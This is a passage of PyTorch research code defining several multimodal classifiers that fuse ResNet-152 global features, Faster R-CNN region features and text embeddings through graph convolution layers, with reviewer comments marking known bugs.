        self.bn3 = nn.BatchNorm1d(1024 + self.reduced_size)
        self.fc3 = nn.Linear(1024 + self.reduced_size, num_classes)
        # ADDITIONAL LAYERS TO TEST SELF LEARNING OF MORPHOLOGY
        self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text1 = nn.Linear(self.embedding_size, 550)
        self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text2 = nn.Linear(550, self.reduced_size)

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask, 0).

        local_features, text_bboxes and local_bboxes are accepted for
        interface compatibility with the other models but are unused here.
        """
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        visual_features = F.relu(self.fc1_bn(self.fc1(x)))  # Visual Features BS x 1024
        x = self.fc_w(visual_features)  # BS x 300 or (embedding size)
        # SELF LEARNING? (re-project textual embeddings to reduced_size)
        textual_features = self.bn_text1(textual_features)
        textual_features = F.leaky_relu(self.fc_text1(textual_features))
        textual_features = self.bn_text2(textual_features)
        textual_features = F.leaky_relu(self.fc_text2(textual_features))
        # USUAL PIPELINE (semantic attention scores in reduced_size space)
        x = torch.bmm(x.view(sample_size, 1, self.reduced_size), textual_features.permute(0, 2, 1))
        x = torch.tanh(x)
        x = F.softmax(x, dim=2)
        # Attention over textual features
        x = torch.bmm(x, textual_features)
        # Reshape visual features before fusion
        # Fuse
        if self.args.fusion != 'concat':
            x = self.fusion([x.view(sample_size, -1),visual_features])
        else:
            x = torch.cat((x[:, 0, :], visual_features), 1)
        '''
        ranking_vector = F.relu(self.fc3(self.bn3(x)))
        x = F.dropout(self.fc4(self.bn4(ranking_vector)), p=0.3, training=self.training)
        '''
        x = F.dropout(self.fc3(self.bn3(x)), p=0.3, training=self.training)
        return x, attn_mask, 0
def normalize(x):
    """L2-normalize ``x`` along dim 1 (each row divided by its norm)."""
    row_norms = x.norm(dim=1, keepdim=True)
    return torch.div(x, row_norms)
def l2norm(X):
    """L2-normalize X along dim 1 (columns of a 2-D input)."""
    denom = X.pow(2).sum(dim=1, keepdim=True).sqrt()
    return X / denom
class globalNet(nn.Module):
    # Network that uses global (Resnet) and local (Faster RCNN VG features)
    """Concatenates a global ResNet-152 feature with the mean of projected
    local region features, then classifies.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(globalNet, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                # print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                # print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        #
        #
        # for param in self.cnn_features.parameters():
        # param.requires_grad = False
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # LOCAL FEATURES N X 36 X 2048
        self.fc2_bn = nn.BatchNorm1d(36)
        self.fc2 = nn.Linear (2048,2048)
        # FINAL LAYER
        self.fc3_bn = nn.BatchNorm1d(2*2048)
        self.fc3 = nn.Linear(2*2048, num_classes)

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask). textual_features, text_bboxes and
        local_bboxes are unused; they exist for interface compatibility.
        """
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        # Project each local region feature, then average over regions.
        v = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
        v = torch.mean(v, dim =1)
        x = torch.cat((x, v), 1)
        x = F.dropout(self.fc3(self.fc3_bn(x)), p=0.3, training=self.training)
        return x, attn_mask
class baseGCN(nn.Module):
    # Network that uses global (Resnet) and local (Faster RCNN VG features)
    """Like globalNet, but the local region features are refined by a
    4-layer Rs_GCN stack before being averaged and concatenated with the
    global feature.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(baseGCN, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                # print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                # print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # GCN reasoning
        self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # LOCAL FEATURES N X 36 X 2048
        self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
        self.fc2 = nn.Linear (2048,2048)
        # FINAL LAYER
        self.fc3_bn = nn.BatchNorm1d(2*2048)
        self.fc3 = nn.Linear(2*2048, num_classes)

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask). textual_features, text_bboxes and
        local_bboxes are unused; they exist for interface compatibility.
        """
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        v = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
        # GCN reasoning
        # -> B,D,N
        GCN_img_emd = v.permute(0, 2, 1)
        GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
        # -> B,N,D
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
        GCN_img_emd = l2norm(GCN_img_emd)
        GCN_img_emd = torch.mean(GCN_img_emd, dim =1)
        x = torch.cat((x, GCN_img_emd), 1)
        x = F.dropout(self.fc3(self.fc3_bn(x)), p=0.3, training=self.training)
        return x, attn_mask
class textGCN(nn.Module):
    # Network that uses global (Resnet) and local (Faster RCNN VG features)
    """GCN-refined local visual features combined with the global feature,
    then semantic attention over projected textual features and a concat
    classifier.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(textGCN, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                # print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                # print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # GCN reasoning
        self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # LOCAL FEATURES N X 36 X 2048
        self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
        self.fc2 = nn.Linear(2048, 2048)
        # Final Visual Features projection
        self.fc_visual_bn = nn.BatchNorm1d(4096)
        self.fc_visual = nn.Linear(4096, 2048)
        # TEXTUAL FEATURES N X 36 X 2048
        self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text1 = nn.Linear(self.embedding_size, 1024)
        self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text2 = nn.Linear(1024, 2048)
        # FINAL LAYER
        self.fc3_bn = nn.BatchNorm1d(2 * 2048)
        self.fc3 = nn.Linear(2 * 2048, num_classes)

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask). text_bboxes and local_bboxes are
        unused; they exist for interface compatibility.
        """
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        # FC for LOCAL Features
        GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
        # GCN reasoning
        # -> B,D,N
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
        GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
        # -> B,N,D
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
        GCN_img_emd = l2norm(GCN_img_emd)
        GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
        # Concatenate Global and Local visual feats
        vf = torch.cat((x, GCN_img_emd), 1)
        vf = F.leaky_relu(self.fc_visual(self.fc_visual_bn(vf)))
        # Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE)
        textual_features = self.bn_text1(textual_features)
        textual_features = F.leaky_relu(self.fc_text1(textual_features))
        textual_features = self.bn_text2(textual_features)
        textual_features = F.leaky_relu(self.fc_text2(textual_features))  # SHAPE: N X MAX_TEXTUAL X 2048
        # ATTENTION USUAL PIPELINE
        x = torch.bmm(vf.view(sample_size, 1, 2048), textual_features.permute(0, 2, 1))
        x = torch.tanh(x)
        x = F.softmax(x, dim=2)
        # Attention over textual features
        x = torch.bmm(x, textual_features)
        # Reshape visual features before fusion
        # Fuse
        if self.args.fusion != 'concat':
            # x = self.fusion([x.view(sample_size, -1), visual_features])
            # NOTE(review): non-concat fusion is not implemented here; this
            # branch only prints and falls through with x still 3-D, so the
            # fc3 below would fail — only 'concat' is supported.
            print('Error FUSION Not implemented')
        else:
            x = torch.cat((x[:, 0, :], vf), 1)
        x = F.dropout(self.fc3(self.fc3_bn(x)), p=0.3, training=self.training)
        return x, attn_mask
class fullGCN(nn.Module):
    # Network that uses global (Resnet) and local (Faster RCNN VG features)
    """Joint GCN reasoning over the union of local visual region features
    and projected textual features; the pooled graph embedding is
    concatenated with the global ResNet feature and classified.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(fullGCN, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        resnet152 = models.resnet152(pretrained)
        # Freeze everything except 'layer4', which is fine-tuned.
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                # print(name + ' is frozen')
                for param in child.parameters():
                    param.requires_grad = False
            else:
                # print(name + ' is not frozen')
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # GCN reasoning
        self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
        # self.Rs_GCN_5 = Rs_GCN(in_channels=2048, inter_channels=2048)
        # self.Rs_GCN_6 = Rs_GCN(in_channels=2048, inter_channels=2048)
        # self.Rs_GCN_7 = Rs_GCN(in_channels=2048, inter_channels=2048)
        # Attention model
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # LOCAL FEATURES N X 36 X 2048
        self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
        self.fc2 = nn.Linear(2048, 2048)
        # TEXTUAL FEATURES N X 36 X 2048
        self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text1 = nn.Linear(self.embedding_size, 1024)
        self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text2 = nn.Linear(1024, 2048)
        # FINAL LAYER
        self.fc3_bn = nn.BatchNorm1d(2 * 2048)
        self.fc3 = nn.Linear(2 * 2048, num_classes)

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask). text_bboxes and local_bboxes are
        unused; they exist for interface compatibility.
        """
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
        # NOTE(review): attn_mask is only bound when self.attention is True.
        x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        # FC for LOCAL Features
        GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
        # Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE)
        textual_features = self.bn_text1(textual_features)
        textual_features = F.leaky_relu(self.fc_text1(textual_features))
        textual_features = self.bn_text2(textual_features)
        textual_features = F.leaky_relu(self.fc_text2(textual_features))  # SHAPE: N X MAX_TEXTUAL X 2048
        # GCN reasoning LOCAL VISUAL + TEXTUAL FEATURES
        # (both modalities become nodes of one graph)
        GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
        # -> B,D,N
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
        GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
        # GCN_img_emd = self.Rs_GCN_5(GCN_img_emd)
        # GCN_img_emd = self.Rs_GCN_6(GCN_img_emd)
        # GCN_img_emd = self.Rs_GCN_7(GCN_img_emd)
        # -> B,N,D
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
        GCN_img_emd = l2norm(GCN_img_emd)
        GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
        # Concatenate Global and Local visual feats
        x = torch.cat((x, GCN_img_emd), dim=1)
        x = F.dropout(self.fc3(self.fc3_bn(x)), p=0.3, training=self.training)
        return x, attn_mask
class dualGCN(nn.Module):
    """Dual-branch GCN classifier over global, local-visual and textual cues.

    Projection of fasttext into the Faster R-CNN space (no initial FC on the
    local features). Two graph branches reason independently:
      * visual-space graph (2048-d nodes): raw local region features
        concatenated with textual features projected to 2048 (Rs_GCN_1..4);
      * textual-space graph (300-d nodes): raw textual embeddings concatenated
        with local features projected to 300 (Rs_GCN_5..8).
    The mean-pooled outputs of both branches are concatenated with the global
    ResNet-152 feature and classified with a single FC layer.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(dualGCN, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        # ResNet-152 backbone: only layer4 is fine-tuned, the rest is frozen.
        resnet152 = models.resnet152(pretrained)
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                for param in child.parameters():
                    param.requires_grad = False
            else:
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # GCN reasoning: visual-space branch (2048-d nodes).
        self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
        # GCN reasoning: textual-space branch (300-d nodes).
        self.Rs_GCN_5 = Rs_GCN(in_channels=300, inter_channels=300)
        self.Rs_GCN_6 = Rs_GCN(in_channels=300, inter_channels=300)
        self.Rs_GCN_7 = Rs_GCN(in_channels=300, inter_channels=300)
        self.Rs_GCN_8 = Rs_GCN(in_channels=300, inter_channels=300)
        # Attention model over the backbone feature map.
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # Global branch: flatten BS x 2048 x 7 x 7 = 100352 -> 2048.
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # Local features N x max_visual x 2048 -> 300 (for the textual graph).
        self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
        self.fc2 = nn.Linear(2048, 300)
        # Textual features N x max_textual x emb -> 2048 (for the visual graph).
        self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text1 = nn.Linear(self.embedding_size, 2048)
        # Project the 300-d textual-graph output into the 2048-d space.
        self.bn_output_gcn = nn.BatchNorm1d(300)
        self.fc_output_gcn = nn.Linear(300, 2048)
        # Final fusion (global + two graph outputs) before classification.
        self.final_bn = nn.BatchNorm1d(3 * 2048)
        self.final_fc = nn.Linear(3 * 2048, num_classes)

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask); attn_mask is None when attention is off."""
        # BUGFIX: attn_mask was unbound at return when self.attention is False.
        attn_mask = None
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
            x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        # Textual features: N x max_textual x emb -> 2048.
        textual_features_2048 = self.bn_text1(textual_features)
        textual_features_2048 = F.leaky_relu(self.fc_text1(textual_features_2048))
        # Local features -> 300 for the textual graph.
        local_features_300 = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
        # Visual graph: RAW local features + projected textual features
        # (intentional per the class design: no initial FC on local features).
        GCN_img_emd = torch.cat((local_features, textual_features_2048), dim=1)
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)  # -> B,D,N
        GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)  # -> B,N,D
        GCN_img_emd = l2norm(GCN_img_emd)
        GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
        # Textual graph: raw textual embeddings + projected local features.
        GCN_text_emd = torch.cat((textual_features, local_features_300), dim=1)
        GCN_text_emd = GCN_text_emd.permute(0, 2, 1)  # -> B,D,N
        GCN_text_emd = self.Rs_GCN_5(GCN_text_emd)
        GCN_text_emd = self.Rs_GCN_6(GCN_text_emd)
        GCN_text_emd = self.Rs_GCN_7(GCN_text_emd)
        GCN_text_emd = self.Rs_GCN_8(GCN_text_emd)
        GCN_text_emd = GCN_text_emd.permute(0, 2, 1)  # -> B,N,D
        GCN_text_emd = l2norm(GCN_text_emd)
        GCN_text_emd = torch.mean(GCN_text_emd, dim=1)
        # Project the textual-graph output (300-d) to the shared 2048-d space.
        GCN_text_emd = F.leaky_relu(self.fc_output_gcn(self.bn_output_gcn(GCN_text_emd)))
        # Fuse global + both graph outputs and classify.
        x = torch.cat((x, GCN_img_emd, GCN_text_emd), dim=1)
        x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
        return x, attn_mask
class fullGCN_attn(nn.Module):
    """GCN classifier with configurable projection and fusion layers.

    Uses global (ResNet-152) and local (Faster R-CNN VG) visual features plus
    textual embeddings. Local + textual nodes are reasoned with eight 2048-d
    GCN layers; the node set is collapsed by a configurable projection layer
    (args.projection_layer: gru / fc / attention / mean) and fused with the
    global feature (args.fusion: block / mlb / attention / dot / concat)
    before classification.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(fullGCN_attn, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        # ResNet-152 backbone: only layer4 is fine-tuned, the rest is frozen.
        resnet152 = models.resnet152(pretrained)
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                for param in child.parameters():
                    param.requires_grad = False
            else:
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # GCN reasoning (2048-d nodes).
        self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_5 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_6 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_7 = Rs_GCN(in_channels=2048, inter_channels=2048)
        self.Rs_GCN_8 = Rs_GCN(in_channels=2048, inter_channels=2048)
        # Attention model over the backbone feature map.
        self.attention = attention
        self.attn = AttentionModel()
        self.attn_bn = nn.BatchNorm2d(2048)
        # Global branch: flatten BS x 2048 x 7 x 7 = 100352 -> 2048.
        self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
        self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
        # Local features N x max_visual x 2048 -> 2048.
        # NOTE(review): the forward pass feeds RAW local features to the
        # graph, so these two layers are currently unused; kept so existing
        # checkpoints still load.
        self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
        self.fc2 = nn.Linear(2048, 2048)
        # Textual features N x max_textual x emb -> 1024 -> 2048.
        self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text1 = nn.Linear(self.embedding_size, 1024)
        self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
        self.fc_text2 = nn.Linear(1024, 2048)
        # Projection layer: collapses graph nodes to one 2048-d vector.
        if self.args.projection_layer == 'gru':
            self.gru_local = nn.GRU(2048, 2048, 1, batch_first=True)
        elif self.args.projection_layer == 'fc' or self.args.projection_layer == 'attention':
            self.bn_projection = nn.BatchNorm1d((self.args.max_textual + self.args.max_visual) * 2048)
            self.fc_projection = nn.Linear((self.args.max_textual + self.args.max_visual) * 2048, 2048)
        # Final fusion before classification.
        if self.args.fusion == 'block':
            self.fusion = Block([2048, 2048], 2048, mm_dim=self.args.mmdim)
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'mlb':
            self.fusion = MLB([2048, 2048], 2048, mm_dim=self.args.mmdim)
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'attention' or self.args.fusion == 'dot':
            # Attention or dot product keep the 2048-d shape.
            self.final_bn = nn.BatchNorm1d(2048)
            self.final_fc = nn.Linear(2048, num_classes)
        elif self.args.fusion == 'concat':
            # Concatenation doubles the feature size.
            self.final_bn = nn.BatchNorm1d(2 * 2048)
            self.final_fc = nn.Linear(2 * 2048, num_classes)
        else:
            print("Error: Last Layer Fusion selected not implemented")

    def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
        """Return (logits, attn_mask); attn_mask is None when attention is off."""
        # BUGFIX: attn_mask was unbound at return when self.attention is False.
        attn_mask = None
        x = self.cnn_features(im)  # Size (BS x 2048 x 7 x 7)
        if self.attention:
            x, attn_mask = self.attn(x)  # Size (BS x 2048)
            x = self.attn_bn(x)
        x = x.view(x.size(0), -1)
        x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
        # Textual features: N x max_textual x emb -> 1024 -> 2048.
        textual_features = self.bn_text1(textual_features)
        textual_features = F.leaky_relu(self.fc_text1(textual_features))
        textual_features = self.bn_text2(textual_features)
        textual_features = F.leaky_relu(self.fc_text2(textual_features))
        # Graph nodes: RAW local features + projected textual features.
        # (An fc2 projection of the local features used to be computed here
        # and immediately overwritten — the dead computation was removed.)
        GCN_img_emd = torch.cat((local_features, textual_features), dim=1)
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)  # -> B,D,N
        GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_5(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_6(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_7(GCN_img_emd)
        GCN_img_emd = self.Rs_GCN_8(GCN_img_emd)
        GCN_img_emd = GCN_img_emd.permute(0, 2, 1)  # -> B,N,D
        GCN_img_emd = l2norm(GCN_img_emd)
        # Collapse graph nodes to a single 2048-d vector.
        if self.args.projection_layer == 'gru':
            rnn_img, hidden_state = self.gru_local(GCN_img_emd)
            GCN_img_emd = hidden_state[0]  # final hidden state of the single layer
        elif self.args.projection_layer == 'fc':
            GCN_img_emd = torch.reshape(GCN_img_emd, (sample_size, -1))
            GCN_img_emd = F.leaky_relu(self.fc_projection(self.bn_projection(GCN_img_emd)))
        elif self.args.projection_layer == 'attention':
            # Attention of the global feature over graph nodes: (B,1,nodes).
            visual_atnn = torch.bmm(x.reshape(sample_size, 1, 2048), GCN_img_emd.permute(0, 2, 1))
            visual_atnn = torch.tanh(visual_atnn)
            # BUGFIX: softmax was taken over dim=1, a singleton dimension,
            # which always yields 1.0 (uniform weights). Normalize over the
            # node dimension instead, consistent with fullGCN_bboxes.
            visual_atnn = F.softmax(visual_atnn, dim=2)
            GCN_img_emd = torch.bmm(visual_atnn, GCN_img_emd).reshape(sample_size, -1)
        elif self.args.projection_layer == 'mean':
            GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
        else:
            print("Forward pass Error in Projection Layer")
        # Fuse with the global feature.
        if self.args.fusion == 'attention':
            visual_atnn = x * GCN_img_emd  # elem-wise mult - Shape: N x 2048
            visual_atnn = torch.tanh(visual_atnn)
            visual_atnn = F.softmax(visual_atnn, dim=1)
            x = visual_atnn * GCN_img_emd
        elif self.args.fusion == 'mlb' or self.args.fusion == 'block':
            x = self.fusion([GCN_img_emd.view(sample_size, -1), x])
        elif self.args.fusion == 'dot':
            x = x * GCN_img_emd  # elem-wise mult - Shape: N x 2048
        elif self.args.fusion == 'concat':
            x = torch.cat((x, GCN_img_emd), dim=1)
        else:
            print('Error on forward pass fusion')
        x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
        return x, attn_mask
class fullGCN_bboxes(nn.Module):
    """GCN classifier with bounding-box positional encodings.

    Uses global (ResNet-152) and local (Faster R-CNN VG) visual features plus
    textual embeddings. Visual and textual nodes are projected to 1920-d and
    each node is extended with a 128-d encoding of its bounding box
    (1920 + 128 = 2048-d nodes), then reasoned with eight GCN layers that
    also return an affinity matrix. Projection / fusion are configurable as
    in fullGCN_attn.
    """

    def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
        super(fullGCN_bboxes, self).__init__()
        self.args = args
        self.embedding_size = embedding_size
        self.num_classes = num_classes
        self.pretrained = pretrained
        # ResNet-152 backbone: only layer4 is fine-tuned, the rest is frozen.
        resnet152 = models.resnet152(pretrained)
        for name, child in resnet152.named_children():
            if name not in ['layer4']:
                for param in child.parameters():
                    param.requires_grad = False
            else:
                for param in child.parameters():
                    param.requires_grad = True
        self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
        # GCN reasoning (node dim = 1920 features + 128 bbox encoding).
        gcn_dim_size = 2048
        self.Rs_GCN_1 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
        self.Rs_GCN_2 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
        self.Rs_GCN_3 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
        self.Rs_GCN_4 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
